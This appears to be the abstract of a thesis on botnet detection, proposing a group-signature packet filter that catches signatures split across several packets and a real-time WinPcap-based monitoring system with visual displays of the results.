| In recent years, with the growing popularity of the Internet and the increasing number of nctizens in China, researchers pay close attention to the botnet. Especially after 2004, the first case of botnet attack in China, people begin to realize that, as a extremely hazardous new-born attack, is no longer a simple virus or a Trojan horse, but an attack platform on which an attacker can not only carry out a variety of attacks, but else spread other virus, Trojan horse and other malicious programs.In this case, the traditional host-based detection means (include anti-virus software, personal firewall etc.) can act as an effective way of killing Trojans, viruses and other malicious programs, resisting some network attacks. But the facts of mistaken deleting of some anti-virus software in recent years have proved that the host-based detection methods in preventing and detecting Trojan, viruses and other bot programs are now insufficient.The botnet clients will keep themselves from being detected not only by hiding in the aspect of files and processes, but also in packets transferring. That means to cut the signature string into peaces and spread them into several packets. This results in that the traditional detecting method based on single packet filtering loses too much accuracy or stop working. This paper presents a botnet detecting method based on group-signature filter, which is suitable for the traditional signatures matching algorithm. This method, using mutiple member signatures to filter the packets of hosts from Intranet, is able to handle the shortened and scattered signatures at a space expense of O{t·mn).Firstly, this paper has descripbed the group signature detecting algorithm, and the details of the detecting system. Also, through the results of detecting, which are showed in this paper, the simulated experiments and experiments in real scenarios have proved that the botnet detecting method based on group-signature filter is feasible, and the detecting system base on the group-signature filtering technique is effective.Furthermore, the implemented detecting system has resolved the problem of real-time packets capturing under high speed network traffic. Owe to the C/C++, WinPcap and muti-thread, there is a low system impact and few packets losses. The detecting system has also provided a visual means for displaying the results. Through the tree mode and the Traffic Map mode, the network managers are able to view the real-time and historical data at any time. The description and storage of signatues are proposed to improve the usability of system. The new signatures can be easily added to the detecting system. |
